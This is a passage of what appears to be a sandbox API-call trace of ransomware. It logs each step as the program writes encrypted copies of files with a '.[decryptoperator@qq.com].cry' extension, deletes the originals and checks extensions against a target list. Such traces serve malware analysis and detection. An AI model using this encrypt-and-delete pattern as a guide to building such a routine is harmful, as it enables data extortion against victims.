lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.697] SetEndOfFile (hFile=0x200) returned 1 [0050.698] CloseHandle (hObject=0x200) returned 1 [0050.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.698] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 1 [0050.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0050.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0050.699] lstrlenW (lpString=".doc") returned 4 [0050.699] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString=".docx") returned 5 [0050.699] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0050.699] lstrlenW (lpString=".pdf") returned 4 [0050.699] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString=".xls") returned 4 [0050.699] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString=".xlsx") returned 5 [0050.699] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0050.699] lstrlenW (lpString=".ppt") returned 4 [0050.699] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0050.699] lstrlenW (lpString=".zip") returned 4 [0050.699] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.699] lstrlenW (lpString=".rar") returned 4 [0050.699] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString=".bz2") returned 4 [0050.699] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString=".7z") returned 3 [0050.699] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0050.699] lstrlenW (lpString=".dbf") returned 4 [0050.699] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0050.699] lstrlenW (lpString=".1cd") returned 4 [0050.699] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 77 [0050.699] lstrlenW (lpString=".jpg") returned 4 [0050.699] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.316] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.316] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0051.317] GetLastError () returned 0x0 [0051.317] ReadFile (in: hFile=0x208, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x2340, lpOverlapped=0x0) returned 1 [0051.361] WriteFile (in: hFile=0x22c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x2350, lpOverlapped=0x0) returned 1 [0051.364] ReadFile (in: hFile=0x208, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.365] WriteFile (in: hFile=0x22c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.365] SetEndOfFile (hFile=0x22c) returned 1 [0051.365] CloseHandle (hObject=0x22c) returned 1 [0051.365] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.365] SetEndOfFile (hFile=0x208) returned 1 [0051.366] CloseHandle (hObject=0x208) returned 1 [0051.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.366] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0051.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0051.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0051.623] lstrlenW (lpString=".doc") returned 4 [0051.623] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.623] lstrlenW (lpString=".docx") returned 5 [0051.623] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.623] lstrlenW (lpString=".pdf") returned 4 [0051.623] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.623] lstrlenW (lpString=".xls") returned 4 [0051.623] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.623] lstrlenW (lpString=".xlsx") returned 5 [0051.623] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.623] lstrlenW (lpString=".ppt") returned 4 [0051.623] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0051.623] lstrlenW (lpString=".zip") returned 4 [0051.623] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.623] lstrlenW (lpString=".rar") returned 4 [0051.623] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.623] lstrlenW (lpString=".bz2") returned 4 [0051.623] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.623] lstrlenW (lpString=".7z") returned 3 [0051.623] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0051.623] lstrlenW (lpString=".dbf") returned 4 [0051.623] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0051.623] lstrlenW (lpString=".1cd") returned 4 [0051.623] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0051.623] lstrlenW (lpString=".jpg") returned 4 [0051.623] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.624] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.624] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.624] GetLastError () returned 0x0 [0051.624] ReadFile (in: hFile=0x228, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xc30, lpOverlapped=0x0) returned 1 [0051.758] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xc40, lpOverlapped=0x0) returned 1 [0051.759] ReadFile (in: hFile=0x228, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.759] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.759] SetEndOfFile (hFile=0x1f0) returned 1 [0051.940] CloseHandle (hObject=0x1f0) returned 1 [0051.941] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.941] SetEndOfFile (hFile=0x228) returned 1 [0051.942] CloseHandle (hObject=0x228) returned 1 [0051.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.942] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0052.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0052.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0052.133] lstrlenW (lpString=".doc") returned 4 [0052.133] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.133] lstrlenW (lpString=".docx") returned 5 [0052.133] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.133] lstrlenW (lpString=".pdf") returned 4 [0052.133] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.133] lstrlenW (lpString=".xls") returned 4 [0052.133] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.133] lstrlenW (lpString=".xlsx") returned 5 [0052.133] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.133] lstrlenW (lpString=".ppt") returned 4 [0052.133] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0052.133] lstrlenW (lpString=".zip") returned 4 [0052.133] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.133] lstrlenW (lpString=".rar") returned 4 [0052.133] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.133] lstrlenW (lpString=".bz2") returned 4 [0052.133] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.133] lstrlenW (lpString=".7z") returned 3 [0052.133] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0052.133] lstrlenW (lpString=".dbf") returned 4 [0052.133] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0052.133] lstrlenW (lpString=".1cd") returned 4 [0052.133] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0052.133] lstrlenW (lpString=".jpg") returned 4 [0052.133] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.226] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.226] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.226] GetLastError () returned 0x0 [0052.226] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x1ba0, lpOverlapped=0x0) returned 1 [0052.365] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1bb0, lpOverlapped=0x0) returned 1 [0052.366] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.366] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.366] SetEndOfFile (hFile=0x194) returned 1 [0052.366] CloseHandle (hObject=0x194) returned 1 [0052.366] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.366] SetEndOfFile (hFile=0x200) returned 1 [0052.367] CloseHandle (hObject=0x200) returned 1 [0052.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.368] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0052.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0052.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0052.368] lstrlenW (lpString=".doc") returned 4 [0052.368] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.368] lstrlenW (lpString=".docx") returned 5 [0052.368] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.368] lstrlenW (lpString=".pdf") returned 4 [0052.368] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.368] lstrlenW (lpString=".xls") returned 4 [0052.368] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.368] lstrlenW (lpString=".xlsx") returned 5 [0052.368] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.368] lstrlenW (lpString=".ppt") returned 4 [0052.368] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0052.369] lstrlenW (lpString=".zip") returned 4 [0052.370] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.370] lstrlenW (lpString=".rar") returned 4 [0052.370] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.370] lstrlenW (lpString=".bz2") returned 4 [0052.370] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.370] lstrlenW (lpString=".7z") returned 3 [0052.370] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0052.370] lstrlenW (lpString=".dbf") returned 4 [0052.370] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0052.370] lstrlenW (lpString=".1cd") returned 4 [0052.370] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0052.370] lstrlenW (lpString=".jpg") returned 4 [0052.370] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.371] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1596) returned 1 [0052.371] CloseHandle (hObject=0x200) returned 1 [0052.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 0x20 [0052.371] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0052.371] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.371] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.372] GetLastError () returned 0x0 [0052.372] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x63c, lpOverlapped=0x0) returned 1 [0052.384] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x640, lpOverlapped=0x0) returned 1 [0052.388] ReadFile (in: hFile=0x200, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.388] WriteFile (in: hFile=0x194, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.388] SetEndOfFile (hFile=0x194) returned 1 [0052.388] CloseHandle (hObject=0x194) returned 1 [0052.388] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.388] SetEndOfFile (hFile=0x200) returned 1 [0052.389] CloseHandle (hObject=0x200) returned 1 [0052.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.389] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0052.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0052.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0052.480] lstrlenW (lpString=".doc") returned 4 [0052.480] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.480] lstrlenW (lpString=".docx") returned 5 [0052.480] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.480] lstrlenW (lpString=".pdf") returned 4 [0052.480] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0052.480] lstrlenW (lpString=".xls") returned 4 [0052.480] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0052.480] lstrlenW (lpString=".xlsx") returned 5 [0052.480] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0052.480] lstrlenW (lpString=".ppt") returned 4 [0052.480] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0052.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0052.480] lstrlenW (lpString=".zip") returned 4 [0052.480] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0052.480] lstrlenW (lpString=".rar") returned 4 [0052.480] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0052.480] lstrlenW (lpString=".bz2") returned 4 [0052.480] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0052.480] lstrlenW (lpString=".7z") returned 3 [0052.480] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0052.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0052.480] lstrlenW (lpString=".dbf") returned 4 [0052.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0052.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0052.480] lstrlenW (lpString=".1cd") returned 4 [0052.480] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0052.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0052.480] lstrlenW (lpString=".jpg") returned 4 [0052.480] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0052.507] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.507] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.507] GetLastError () returned 0x0 [0052.507] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x66dc, lpOverlapped=0x0) returned 1 [0052.593] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x66e0, lpOverlapped=0x0) returned 1 [0052.614] ReadFile (in: hFile=0x204, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.614] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.614] SetEndOfFile (hFile=0x1bc) returned 1 [0052.614] CloseHandle (hObject=0x1bc) returned 1 [0052.614] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.614] SetEndOfFile (hFile=0x204) returned 1 [0052.615] CloseHandle (hObject=0x204) returned 1 [0052.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.615] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0052.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0052.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0052.615] lstrlenW (lpString=".doc") returned 4 [0052.615] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0052.615] lstrlenW (lpString=".docx") returned 5 [0052.615] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0052.615] lstrlenW (lpString=".pdf") returned 4 [0052.616] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") 